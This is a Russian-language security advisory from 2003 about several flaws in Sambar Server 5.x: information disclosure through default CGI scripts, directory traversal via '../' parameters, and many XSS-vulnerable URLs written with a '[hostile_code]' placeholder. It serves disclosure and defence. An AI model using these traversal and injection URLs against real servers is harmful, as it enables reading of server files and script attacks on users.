Дата публикации: | 31.03.2003 |
Всего просмотров: | 1318 |
Опасность: | Низкая |
Наличие исправления: | Нет |
Количество уязвимостей: | 1 |
CVE ID: | Нет данных |
Вектор эксплуатации: | Удаленная |
Воздействие: |
Межсайтовый скриптинг Раскрытие важных данных Раскрытие системных данных |
CWE ID: | Нет данных |
Наличие эксплоита: | Нет данных |
Уязвимые продукты: | Sambar Server 5.x |
Описание: |
Обнаружено несколько уязвимостей в Sambar Server. Удаленный пользователь может получить информацию об сервере и содержание произвольных каталогов и файлов. Также удаленный пользователь может выполнить XSS нападение против пользователей Sambar Server. В установке по умолчанию включены сценарии 'testcgi.exe' и 'environ.pl'. Удаленный пользователь может опросить эти сценарии, чтобы получить информацию о системе, включая полный инсталляционный путь: http://[target]/cgi-bin/environ.pl http://[target]/cgi-bin/testcgi.exeУдаленный пользователь может просмотреть содержание каталогов и файлов, запрашивая следующий URL: http://[target]/sysuser/docmgr/iecreate.stm?template=. ./ http://[target]/sysuser/docmgr/ieedit.stm?url=../Также обнаружено, что сразу несколько сценариев не фильтруют HTML код в данных, представленных пользователем. В результате удаленный атакующий может выполнить XSS нападение против пользователя Sambar Server. Пример: http://[target]/netutils/ipdata.stm?ipaddr=[hostile_code] http://[target]/netutils/whodata.stm?sitename=[hostile_code] http://[target]/netutils/findata .stm?user=[hostile_code] http://[target]/netutils/findata.stm?host=[hostile_code] http://[target]/isapi/testisa.dll?check1=[hostile_code] http://[target]/cgi-bin/envir on.pl?param1=[hostile_code] http://[target]/samples/search.dll?query=[hostile_code]&logic=AND http://[target]/wwwping/index.stm?wwwsite=[hostile_code] http://[target]/ syshelp/stmex.stm?foo=[hostile_code]&bar=456 http://[target]/syshelp/stmex.stm?foo=123&bar=[hostile_code] http://[target]/syshelp/cscript/showfunc.stm?func=[hostile_cod e] http://[target]/syshelp/cscript/showfncs.stm?pkg=[hostile_code] http://[target]/syshelp/cscript/showfnc.stm?pkg=[hostile_code] http://[target]/sysuser/docmgr/ieedit .stm?path=[hostile_code] http://[target]/sysuser/docmgr/ieedit.stm?name=[hostile_code] http://[target]/sysuser/docmgr/edit.stm?path=[hostile_code] http://[target]/sysu ser/docmgr/edit.stm?name=[hostile_code] http://[target]/sysuser/docmgr/iecreate.stm?path=[hostile_code] http://[target]/sysuser/docmgr/create.stm?path=[hostile_code] h ttp://[target]/sysuser/docmgr/info.stm?path=[hostile_code] http://[target]/sysuser/docmgr/info.stm?name=[hostile_code] http://[target]/sysuser/docmgr/ftp.stm?path=[host ile_code] http://[target]/sysuser/docmgr/htaccess.stm?path=[hostile_code] http://[target]/sysuser/docmgr/mkdir.stm?path=[hostile_code] http://[target]/sysuser/docmgr/r ename.stm?path=[hostile_code] http://[target]/sysuser/docmgr/rename.stm?name=[hostile_code] http://[target]/sysuser/docmgr/search.stm?path=[hostile_code] http://[targe t]/sysuser/docmgr/search.stm?query=[hostile_code] http://[target]/sysuser/docmgr/sendmail.stm?path=[hostile_code] http://[target]/sysuser/docmgr/sendmail.stm?name=[host ile_code] http://[target]/sysuser/docmgr/template.stm?path=[hostile_code] http://[target]/sysuser/docmgr/update.stm?path=[hostile_code] http://[target]/sysuser/docmgr/ update.stm?name=[hostile_code] http://[target]/sysuser/docmgr/vccheckin.stm?path=[hostile_code] http://[target]/sysuser/docmgr/vccheckin.stm?name=[hostile_code] http:/ /[target]/sysuser/docmgr/vccreate.stm?path=[hostile_code] http://[target]/sysuser/docmgr/vccreate.stm?name=[hostile_code] http://[target]/sysuser/docmgr/vchist.stm?path =[hostile_code] http://[target]/sysuser/docmgr/vchist.stm?name=[hostile_code] http://[target]/cgi-bin/testcgi.exe?[hostile_code]Уязвимость обнаружена в Sambar Server 5.3 |
Ссылки: | Multiple vulnerabilities in Sambar Server |